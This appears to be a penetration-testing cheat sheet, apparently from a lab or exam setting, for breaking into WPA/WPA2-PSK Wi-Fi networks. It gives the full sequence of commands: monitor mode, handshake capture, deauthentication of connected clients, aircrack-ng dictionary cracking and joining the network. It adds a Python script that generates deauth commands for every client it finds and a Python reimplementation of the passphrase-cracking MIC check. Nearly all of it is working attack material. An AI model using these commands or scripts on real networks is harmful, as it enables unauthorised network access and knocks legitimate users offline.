WPA-PSK

WPA/WPA2

Setup

sudo airmon-ng check kill

sudo airmon-ng start wlan0

sudo airodump-ng wlan0mon

Note the target's CH (channel), ESSID, BSSID and the connected clients; AUTH PSK means WPA Personal (pre-shared key), which is what this page cracks

Capture the handshake; with -w wpa, airodump-ng numbers its output files, so the capture lands in wpa-01.cap

# -c channel, --essid/--bssid lock the capture onto the target AP, -w output prefix (files are numbered: wpa-01.cap)
sudo airodump-ng -c # --essid AP_NAME --bssid XX:XX:XX:XX:XX:XX -w wpa --output-format pcap wlan0mon

Deauthenticate one connected client once; when it reconnects, airodump-ng captures the 4-way handshake (watch for "WPA handshake: <BSSID>" in its header line)

# -0 1 = one deauth burst, -a AP MAC, -c client MAC
sudo aireplay-ng -0 1 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY wlan0mon
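The recon step above (channel, BSSID, client MAC) can be pulled out of the CSV that airodump-ng writes next to the .cap when -w is used, as long as --output-format does not restrict it to pcap only (the default writes csv too, or add csv to the list). The script below is an added example, not part of the original notes and not an aircrack-ng tool: it parses that CSV, picks the AP for the target ESSID, checks that its authentication is PSK, lists the stations associated with it, and fills in the airodump-ng/aireplay-ng lines from above. The CSV text is constructed in airodump-ng's layout with made-up MACs and timestamps.

```python
import csv
import io

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv:
# an AP section, a blank line, then a station section. MACs are made up.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 12:00:00, 2024-01-01 12:05:00,  6,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   7, AP_NAME,
AA:BB:CC:DD:EE:01, 2024-01-01 12:00:00, 2024-01-01 12:05:00, 11, 130, WPA2, CCMP, MGT, -60,       80,        0,   0.  0.  0.  0,   9, CORP-WIFI,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
66:77:88:99:AA:BB, 2024-01-01 12:00:10, 2024-01-01 12:04:59, -50,       30, 00:11:22:33:44:55, AP_NAME
CC:DD:EE:FF:00:11, 2024-01-01 12:01:00, 2024-01-01 12:04:30, -70,        5, (not associated), AP_NAME,CORP-WIFI
"""


def parse_airodump_csv(text):
    """Split the CSV into its AP and station sections and return two lists of dicts."""
    text = text.replace("\r\n", "\n").strip()
    ap_part, _, sta_part = text.partition("\n\n")   # blank line separates the sections
    aps, stations = [], []
    for row in csv.reader(io.StringIO(ap_part), skipinitialspace=True):
        if len(row) < 14 or row[0] == "BSSID":       # header or empty line
            continue
        aps.append({"bssid": row[0], "channel": int(row[3]), "privacy": row[5],
                    "auth": row[7], "essid": row[13]})
    for row in csv.reader(io.StringIO(sta_part), skipinitialspace=True):
        if len(row) < 6 or row[0] == "Station MAC":
            continue
        stations.append({"mac": row[0], "bssid": row[5],
                         "probed": [p for p in row[6:] if p]})   # probed list may hold several names
    return aps, stations


def pick_target(aps, stations, essid):
    """BSSID, channel, whether auth is PSK (WPA Personal) and the associated
    clients for one ESSID, or None when the ESSID was not seen."""
    for ap in aps:
        if ap["essid"] == essid:
            return {"bssid": ap["bssid"], "channel": ap["channel"],
                    "psk": ap["auth"] == "PSK",
                    "clients": [s["mac"] for s in stations if s["bssid"] == ap["bssid"]]}
    return None


def capture_commands(target, essid, iface="wlan0mon"):
    """The airodump-ng and aireplay-ng lines from the notes, filled in from the CSV.
    One deauth line per associated client; an AP with no clients cannot be deauthed."""
    cmds = [f"airodump-ng -c {target['channel']} --essid {essid} --bssid {target['bssid']} "
            f"-w wpa --output-format pcap {iface}"]
    for client in target["clients"]:
        cmds.append(f"aireplay-ng -0 1 -a {target['bssid']} -c {client} {iface}")
    return cmds


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    target = pick_target(aps, stations, "AP_NAME")
    if target and target["psk"]:
        print("\n".join(capture_commands(target, "AP_NAME")))
```

Stations with BSSID "(not associated)" are only probing and are skipped, which is why the second station in the sample is not offered as a deauth target.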

Cracking

aircrack-ng

# -w wordlist, -b bssid, -e essid (the ESSID salts the PSK derivation, so it must match exactly)
aircrack-ng -w /usr/share/john/password.lst -e AP_NAME -b XX:XX:XX:XX:XX:XX wpa-01.cap
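What aircrack-ng does with that command, as an added example that is not part of the original notes and not aircrack-ng's code: for every wordlist candidate it derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds) (this is also why -e must be the exact ESSID, and its hex is the 64-character form you may put in the psk= line of wpa_supplicant.conf instead of the quoted passphrase), expands it with the 802.11i PRF into the PTK using the two MACs and the two nonces from the handshake, and checks the first 16 bytes (KCK) against the MIC of handshake message 2. The handshake below is constructed for the example with hypothetical MACs, nonces and passphrase, and message 2 is built with an empty key-data field; only WPA2 (key descriptor version 2, HMAC-SHA1 MIC) is covered, not the WPA1 HMAC-MD5 variant.

```python
import hashlib
import hmac

# Offset of the 16-byte MIC inside an EAPOL-Key frame: 4-byte 802.1X header,
# then descriptor type(1), key info(2), key length(2), replay counter(8),
# nonce(32), key IV(16), RSC(8), ID(8).
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8


def pmk_from_passphrase(ssid: str, passphrase: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).
    Its hex is the 64-char value wpa_passphrase emits for psk=."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:64]


def eapol_mic(kck: bytes, frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    return hmac.new(kck, frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Handshake message 2 (client -> AP) as an EAPOL-Key frame.
    Constructed for this example: the key data (RSN IE) is left empty."""
    body = (b"\x02"                         # descriptor type: RSN
            + b"\x01\x0a"                   # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x10"                   # key length
            + bytes(8)                      # replay counter
            + snonce                        # key nonce (SNonce in message 2)
            + bytes(16) + bytes(8) + bytes(8)   # key IV, RSC, ID
            + mic
            + b"\x00\x00")                  # key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def crack(ssid, ap_mac, client_mac, anonce, snonce, msg2, wordlist):
    """Per candidate: passphrase -> PMK -> PTK -> KCK -> MIC, compared with the
    captured MIC. Returns the passphrase or None (wordlist exhausted)."""
    captured = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + bytes(16) + msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        candidate = candidate.rstrip("\n")
        if not 8 <= len(candidate) <= 63:   # WPA passphrases are 8..63 chars
            continue
        kck = ptk_from_pmk(pmk_from_passphrase(ssid, candidate),
                           ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured):
            return candidate
    return None


# Constructed handshake standing in for wpa-01.cap (hypothetical MACs and nonces).
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def make_sample_msg2(ssid: str, passphrase: str) -> bytes:
    """Build message 2 with a valid MIC for the given SSID/passphrase."""
    kck = ptk_from_pmk(pmk_from_passphrase(ssid, passphrase),
                       AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE)))


if __name__ == "__main__":
    msg2 = make_sample_msg2("AP_NAME", "letmein123")
    print(crack("AP_NAME", AP_MAC, CLIENT_MAC, ANONCE, SNONCE, msg2,
                ["password", "letmein123", "short"]))
```

Running crack() with a wrong SSID never matches even with the right passphrase in the list, which is the failure you get from a mistyped -e; the 4096-round PBKDF2 per candidate is also why a wordlist attack on a long random passphrase is hopeless.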

Connect to the network with retrieved credentials

Create wpa_supplicant.conf

network={
  ssid="network"
  scan_ssid=1
  psk="password"
  key_mgmt=WPA-PSK
}

Connect to network (the card must be back in managed mode, so stop monitor mode with airmon-ng first; wpa_supplicant needs the interface as well as the config)

sudo wpa_supplicant -B -i wlan0 -c wpa_supplicant.conf

sudo dhclient wlan0

Get proof

curl http://192.168.1.1/proof.txt
